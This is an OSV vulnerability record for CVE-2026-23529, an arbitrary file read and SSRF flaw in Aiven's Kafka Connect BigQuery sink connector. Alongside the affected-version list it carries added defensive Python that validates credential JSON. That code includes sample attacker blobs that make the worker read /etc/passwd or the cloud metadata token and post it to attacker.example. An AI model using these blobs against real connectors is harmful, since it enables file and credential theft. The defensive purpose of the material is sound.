CVE-2026-23529

Source
https://cve.org/CVERecord?id=CVE-2026-23529
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-23529.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2026-23529
Aliases
  • GHSA-3mg8-2g53-5gj4
Published
2026-01-16T16:53:17.830Z
Modified
2026-01-18T03:44:39.386293Z
Severity
  • 7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Summary
Arbitrary File Read in Google BigQuery Sink connector
Details

Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, the Google BigQuery Sink connector is vulnerable to arbitrary file read. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configuration to authenticate to BigQuery. During connector configuration, users can supply credential JSON that is handed to the Google authentication libraries. The connector does not validate this externally supplied credential configuration before passing it to the authentication libraries. An attacker who can create or update a connector (the PR:L in the CVSS vector) can exploit this by supplying a malicious credential configuration containing a crafted credential_source.file path or credential_source.url endpoint, causing the Connect worker to read arbitrary local files or to issue server-side requests (SSRF) on the attacker's behalf.
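The mechanism behind the advisory is a property of Google's credential JSON format rather than of the connector: an "external_account" (workload identity federation) credential tells the auth library to obtain a subject token from credential_source.file (a local file read) or credential_source.url (an HTTP fetch) and then POST that token to token_url. Whoever controls the JSON therefore controls both what the worker reads and where the bytes are sent. The following is an added example, not the connector's own code and not the fix shipped in 2.11.0: a stdlib-only pre-validation an operator can apply to any credential blob before it reaches the auth library, plus a helper that lists what an external_account blob would make the library read or contact, for triaging existing configs. The sample credential blobs, the attacker.example host and the function names are constructed for illustration.

```python
"""Pre-validation of a Google credential JSON before the Google auth library sees it.

Added example (not the connector's code, not the 2.11.0 fix). check_credential_json()
accepts only a plain service_account key; fetch_targets() reports what an
external_account blob would make the auth library read or contact.
"""
import json
from urllib.parse import urlparse

# Only a plain key pair is accepted. external_account credentials are the type
# whose credential_source.file / .url the auth library resolves on the worker,
# which is the file read / SSRF the advisory describes.
ALLOWED_TYPES = {"service_account"}
# token_uri of a service_account key must stay on Google's OAuth endpoint.
GOOGLE_TOKEN_HOSTS = {"oauth2.googleapis.com"}
# Keys that make the auth library read a file, fetch a URL, or chain to another
# credential; a service_account key never legitimately carries them.
FETCHING_KEYS = {"credential_source", "source_credentials",
                 "service_account_impersonation_url", "token_url"}


def check_credential_json(raw: str) -> tuple[bool, str]:
    """Return (accepted, reason). Runs before any auth-library call sees the blob."""
    try:
        cred = json.loads(raw)
    except ValueError as exc:
        return False, f"not valid JSON: {exc}"
    if not isinstance(cred, dict):
        return False, "credential must be a JSON object"
    ctype = cred.get("type")
    if ctype not in ALLOWED_TYPES:
        return False, f"credential type {ctype!r} is not allowed"
    # Belt and braces: an allowed type smuggling fetching keys is still rejected.
    bad = sorted(FETCHING_KEYS & cred.keys())
    if bad:
        return False, f"unexpected keys {bad} in service_account credential"
    if not cred.get("client_email") or not cred.get("private_key"):
        return False, "service_account credential lacks client_email or private_key"
    token_uri = urlparse(cred.get("token_uri", "https://oauth2.googleapis.com/token"))
    if token_uri.scheme != "https" or token_uri.hostname not in GOOGLE_TOKEN_HOSTS:
        return False, f"token_uri {token_uri.geturl()!r} is not a Google OAuth endpoint"
    return True, "ok"


def fetch_targets(raw: str) -> dict:
    """What an external_account credential would make the auth library touch."""
    cred = json.loads(raw)
    targets = {}
    source = cred.get("credential_source")
    if isinstance(source, dict):
        for key in ("file", "url"):          # local file read / outbound HTTP fetch
            if key in source:
                targets[key] = source[key]
        executable = source.get("executable")
        if isinstance(executable, dict) and "command" in executable:
            targets["command"] = executable["command"]
    for key in ("token_url", "service_account_impersonation_url"):
        if key in cred:                      # where the subject token gets posted
            targets[key] = cred[key]
    return targets


# --- Constructed sample inputs (not taken from the advisory) ---------------------
BENIGN_KEY = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "private_key_id": "0123456789abcdef",
    "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEv...\n-----END PRIVATE KEY-----\n",
    "client_email": "bq-sink@example-project.iam.gserviceaccount.com",
    "token_uri": "https://oauth2.googleapis.com/token",
})

# Hypothetical attacker blob: the worker reads /etc/passwd as the "subject token"
# and posts it to the attacker-controlled token_url.
FILE_READ_KEY = json.dumps({
    "type": "external_account",
    "audience": "//iam.googleapis.com/projects/0/locations/global/workloadIdentityPools/p/providers/x",
    "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
    "token_url": "https://attacker.example/sts",
    "credential_source": {"file": "/etc/passwd"},
})

# Hypothetical SSRF blob: the worker fetches the cloud metadata endpoint instead.
SSRF_KEY = json.dumps({
    "type": "external_account",
    "audience": "//iam.googleapis.com/projects/0/locations/global/workloadIdentityPools/p/providers/x",
    "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
    "token_url": "https://attacker.example/sts",
    "credential_source": {
        "url": "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
        "headers": {"Metadata-Flavor": "Google"},
    },
})

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_KEY), ("file read", FILE_READ_KEY), ("ssrf", SSRF_KEY)):
        print(name, check_credential_json(blob), fetch_targets(blob))
```

The same check can be run over the output of the Connect REST endpoint GET /connectors?expand=config to find already-deployed connectors carrying an external_account blob; fetch_targets() then shows which file or URL that connector would have caused the worker to read. Rejecting every type other than service_account is deliberately stricter than the auth library: if workload identity federation is genuinely needed, the credential_source should be fixed by the operator on the worker, not accepted from the connector config.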

Database specific
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/23xxx/CVE-2026-23529.json",
    "cna_assigner": "GitHub_M",
    "cwe_ids": [
        "CWE-73",
        "CWE-918"
    ]
}
References

Affected packages

Git / github.com/aiven-open/bigquery-connector-for-apache-kafka

Affected ranges

Type
GIT
Repo
https://github.com/aiven-open/bigquery-connector-for-apache-kafka
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed

Affected versions

1.*

1.1.0
1.1.1
1.1.2
1.2.0
1.3.0
1.4.1
1.5.1
1.5.2
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.6.5

Other

rcca-1766-1

v0.*

v0.17.0

v1.*

v1.1.3
v1.2.1
v1.3.1
v1.4.2
v1.5.3
v1.6.6
v1.6.7
v1.6.8
v1.6.9
v1.6.10

v2.*

v2.0.0
v2.0.1
v2.0.2
v2.0.3
v2.0.4
v2.0.5
v2.0.6
v2.0.7
v2.0.8
v2.0.9
v2.0.10
v2.0.11
v2.0.12
v2.0.13
v2.0.14
v2.0.15
v2.1.0
v2.1.1
v2.1.2
v2.1.3
v2.1.4
v2.1.5
v2.1.6
v2.1.7
v2.1.8
v2.1.9
v2.1.10
v2.1.11
v2.1.12
v2.1.13
v2.1.14
v2.1.15
v2.1.16
v2.1.17
v2.2.0
v2.2.1
v2.2.2
v2.2.3
v2.2.4
v2.2.5
v2.2.6
v2.2.7
v2.3.0
v2.3.1
v2.3.2
v2.3.3
v2.3.4
v2.3.5
v2.3.6
v2.3.7
v2.3.8
v2.3.9
v2.3.10
v2.3.11
v2.4.0
v2.4.1
v2.4.2
v2.4.3
v2.4.4
v2.4.5
v2.4.6
v2.5.0
v2.5.1
v2.5.2
v2.6.0
v2.7.0
v2.8.0
v2.9.0
v2.10.0
v2.10.1
v2.10.2
v2.10.3

Database specific

source

"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-23529.json"